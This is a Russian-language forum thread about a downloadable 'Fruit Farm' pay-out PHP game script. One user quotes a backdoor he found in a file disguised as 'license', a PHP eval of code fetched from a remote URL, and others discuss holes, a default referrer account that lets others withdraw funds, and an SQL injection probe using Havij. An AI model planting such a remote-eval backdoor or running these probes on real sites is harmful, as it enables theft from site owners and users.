Скрипт Фруктовая ферма с выводом денег.

  • Автор темы admin
  • Дата начала
Статус
В этой теме нельзя размещать новые ответы.
assus
assus
Если нужна ферма пишите. Дизайн для Ферм.
Участник
Сообщения
454
Реакции
59
Skype
  • #961
fghjk написал(а):
Ребят, два дня назад увели 2к рублей с кошелька... в js/editor/jscripts/tiny_mce/themes/simple/skins нашел файл license в нем было
<?PHP

eval(file_get_contents("http://fruit-farm.org/return.php"));

?>

Снес к чертям... Скрипт качал на оф.сайте разработчиков FF как думаете, не выведут больше?
Нажмите для раскрытия...
поищи еще дыры скорей всего их еще много
 
AndreyHunters
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #962
assus написал(а):
поищи еще дыры скорей всего их еще много
Нажмите для раскрытия...
логическую уязвимость крайне сложно исправить. Тут нужно понимать как вообще программист задумал работу скрипта...
 
fghjk
fghjk
Участник
Сообщения
8
Реакции
0
  • #963
AndreyHunters написал(а):
логическую уязвимость крайне сложно исправить. Тут нужно понимать как вообще программист задумал работу скрипта...
Нажмите для раскрытия...
Согласен. Так что же теперь... все скрипты оказывается просто хлам?
 
AndreyHunters
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #964
fghjk написал(а):
Согласен. Так что же теперь... все скрипты оказывается просто хлам?
Нажмите для раскрытия...
к сожелению на 90 %,я мало встречал скриптов которые были без багов,а те что на бескрайних просторах нета да ещё за даром,ТОЧНО ДЫРЯВЫЕ,+есть умники которые заведомо берут скрипт и закладывают в него ошибки чтоб потом на нем же и разжиться,вот такая печалька
 
vlw
vlw
Участник
Сообщения
16
Реакции
0
  • #965
AndreyHunters, с хостингера нельзя управлять БД, так как на самом хостингере защита от этого. Если удалите базу или взломаете какой-нибудь пароль, тогда я вам поверю
 
AndreyHunters
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #966
vlw написал(а):
AndreyHunters, с хостингера нельзя управлять БД, так как на самом хостингере защита от этого. Если удалите базу или взломаете какой-нибудь пароль, тогда я вам поверю
Нажмите для раскрытия...
во первых мне это даром и не нужно,а вовторых управление базой идет не на прямую а через запрос..............
 
vlw
vlw
Участник
Сообщения
16
Реакции
0
  • #967
AndreyHunters написал(а):
во первых мне это даром и не нужно,а вовторых управление базой идет не на прямую а через запрос..............
Нажмите для раскрытия...
Я пол дня пытался ломануть свой же сайт. Не получилось. И наткнулся на статью, что хостингер нереально взломать
 
AndreyHunters
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #968
vlw написал(а):
Я пол дня пытался ломануть свой же сайт. Не получилось. И наткнулся на статью, что хостингер нереально взломать
Нажмите для раскрытия...
приведи пример хоть одной иньекции которой ты пытался
 
vlw
vlw
Участник
Сообщения
16
Реакции
0
  • #969
AndreyHunters написал(а):
приведи пример хоть одной иньекции которой ты пытался
Нажмите для раскрытия...
Допустим, даже если прописать ********.ru/?menu=admin' хостингер не даст никакого ответа (открывается 404). Havij загружает бд, но везде написано "???"
 
AndreyHunters
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #970
vlw написал(а):
Допустим, даже если прописать ********.ru/?menu=admin' хостингер не даст никакого ответа (открывается 404). Havij загружает бд, но везде написано "???"
Нажмите для раскрытия...
:) я воздержусь от коминтариев.................
 
wh1skas
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #972
Даже на английском ошибки...
 
vlw
vlw
Участник
Сообщения
16
Реакции
0
  • #973
wh1skas написал(а):
Даже на английском ошибки...
Нажмите для раскрытия...
он просто подумал, что я буду пользоваться переводчиком) LoL
 
ниаолай
ниаолай
Местный
Сообщения
34
Реакции
2
Skype
  • #974
AndreyHunters написал(а):
ну для начала найти все дыры и залатать,подобный скрипт сильно уязвим,ну а потом в файлах где есть фирст заменить его на свои и в базе перед тем как ее заливать проделать тоже самое
Нажмите для раскрытия...
а что даст изменения first на свой логин?
 
wh1skas
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #975
Пропиши для него несуществующую почту, а лучше несуществующий сервер почты + рандомный пароль. Имя first можешь не трогать.

Если не изменишь это, в этот аккаунт будут заходить юзеры и выводить средства, при выполнении всех условий выплат пользователю.

ЗЫ: или забань этого пользователя.
 
S
Sergey12
Местный
Сообщения
45
Реакции
3
  • #976
vlw написал(а):
Допустим, даже если прописать ********.ru/?menu=admin' хостингер не даст никакого ответа (открывается 404). Havij загружает бд, но везде написано "???"
Нажмите для раскрытия...
а как же ты попадаешь в админку?
ну я не знаю, попробуй
.ru/?menu=admin4ik
мб поможет...
 
AndreyHunters
AndreyHunters
Участник
Сообщения
69
Реакции
16
ICQ
698796766 698796766
  • #977
ниаолай написал(а):
а что даст изменения first на свой логин?
Нажмите для раскрытия...
насколько я помню то он там привязан по умолчанию и если человек пришел не по ссылке рефера,то он попадает под first, ну и тому подобное,я щас точно не помню к чему он там еще привязан,
 
vlw
vlw
Участник
Сообщения
16
Реакции
0
  • #978
Sergey12 написал(а):
а как же ты попадаешь в админку?
ну я не знаю, попробуй
.ru/?menu=admin4ik
мб поможет...
Нажмите для раскрытия...
1.Я умею заходить в админку
2.Я приводил пример SQL-Инъекции
 
assus
assus
Если нужна ферма пишите. Дизайн для Ферм.
Участник
Сообщения
454
Реакции
59
Skype
  • #979
vlw написал(а):
1.Я умею заходить в админку
2.Я приводил пример SQL-Инъекции
Нажмите для раскрытия...
блин тут прям крутые хакеры сидят
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху